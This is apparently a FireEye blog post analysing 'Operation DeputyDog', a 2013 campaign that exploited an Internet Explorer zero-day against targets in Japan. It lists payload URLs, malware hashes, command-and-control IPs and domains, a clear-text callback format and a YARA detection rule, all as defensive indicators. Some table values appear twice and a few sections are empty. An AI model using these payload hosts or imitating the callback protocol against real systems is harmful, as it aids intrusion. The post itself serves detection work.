FireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign, which we have labeled ‘Operation DeputyDog', began as early as August 19, 2013 and appears to have targeted organizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor responsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current campaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on Bit9.

Campaign Details

On September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was being used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in Japan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same threat actor that compromised Bit9 in February 2013.

FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong (210.176.3.130) and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable (MD5: 8aba4b5184072f2a50cbc5ecfe326701).

Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

C:\Documents and Settings\All Users\Application Data\28542CC0.dll

In order to maintain persistence, the original malware adds this registry key:

The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea (180.150.228.102). This callback traffic is HTTP over port 443 (which is typically used for HTTPS encrypted traffic; however, the traffic is not HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:

POST /info.asp HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Agtid: [8 chars]08x

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: 180.150.228.102:443

Content-Length: 1045

Connection: Keep-Alive

Cache-Control: no-cache

[8 chars]08x&[Base64 Content]

The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.

A second related sample was also delivered from 111.118.21.105/css/sun.css on September 5, 2013. The sun.css file was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87 and it communicated with the same communications protocol described above to the same command and control server at 180.150.228.102.

Related Samples

We found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701, were compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.

These samples both had a string that may have been an artifact of the builder used to create the binaries. This string was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA signature, based on this unique attribute:

rule APT_DeputyDog_Strings

{

meta:

author = "FireEye Labs"

version = "1.0"

description = "detects string seen in samples used in 2013-3893 0day attacks"

reference = "8aba4b5184072f2a50cbc5ecfe326701"

strings:

$mz = {4d 5a}

$a = "DGGYDSYRL"

condition:

($mz at 0) and $a

}

We used this signature to identify 5 other potentially related samples:

MD5

Compile Time (UTC)

C2 Server

58dc05118ef8b11dcb5f5c596ab772fd58dc05118ef8b11dcb5f5c596ab772fd

2013-08-19 13:21:582013-08-19 13:21:58

180.150.228.102180.150.228.102

4d257e569539973ab0bbafee8fb875824d257e569539973ab0bbafee8fb87582

2013-08-19 13:21:582013-08-19 13:21:58

103.17.117.90103.17.117.90

dbdb1032d7bb4757d6011fb1d077856cdbdb1032d7bb4757d6011fb1d077856c

2013-08-19 13:21:592013-08-19 13:21:59

110.45.158.5110.45.158.5

645e29b7c6319295ae8b13ce8575dc1d645e29b7c6319295ae8b13ce8575dc1d

2013-08-19 13:21:592013-08-19 13:21:59

103.17.117.90103.17.117.90

e9c73997694a897d3c6aadb26ed34797e9c73997694a897d3c6aadb26ed34797

2013-04-13 13:42:452013-04-13 13:42:45

110.45.158.5110.45.158.5

Note that all of the samples, except for e9c73997694a897d3c6aadb26ed34797, were compiled on 2013-08-19, within 1 second of each other.

We pivoted off the command and control IP addresses used by these samples and found the following known malicious domains recently pointed to 180.150.228.102.

Domain

First Seen

Last Seen

ea.blankchair.comea.blankchair.com

2013-09-01 05:02:222013-09-01 05:02:22

2013-09-01 08:25:222013-09-01 08:25:22

rt.blankchair.comrt.blankchair.com

2013-09-01 05:02:212013-09-01 05:02:21

2013-09-01 08:25:242013-09-01 08:25:24

ali.blankchair.comali.blankchair.com

2013-09-01 05:02:202013-09-01 05:02:20

2013-09-01 08:25:222013-09-01 08:25:22

dll.freshdns.orgdll.freshdns.org

2013-07-01 10:48:562013-07-01 10:48:56

2013-07-09 05:00:032013-07-09 05:00:03

Links to Previous Campaigns

According to Bit9, the attackers that penetrated their network dropped two variants of the HiKit rootkit. One of these Hitkit samples connected to a command and control server at downloadmp3server[.]servemp3[.]com that resolved to 66.153.86.14. This same IP address also hosted www[.]yahooeast[.]net, a known malicious domain, between March 6, 2012 and April 22, 2012.

The domain yahooeast[.]net was registered to 654@123.com. This email address was also used to register blankchair[.]com – the domain that we see was pointed to the 180.150.228.102 IP, which is the callback associated with sample 58dc05118ef8b11dcb5f5c596ab772fd, and has been already correlated back to the attack leveraging the CVE-2013-3893 zero-day vulnerability.

Threat Actor Attribution

Conclusion

While these attackers have a demonstrated previously unknown zero-day exploits and a robust set of malware payloads, using the techniques described above, it is still possible for network defense professionals to develop a rich set of indicators that can be used to detect their attacks. This is the first part of our analysis, we will provide more detailed analysis on the other components of this attack in subsequent blog post.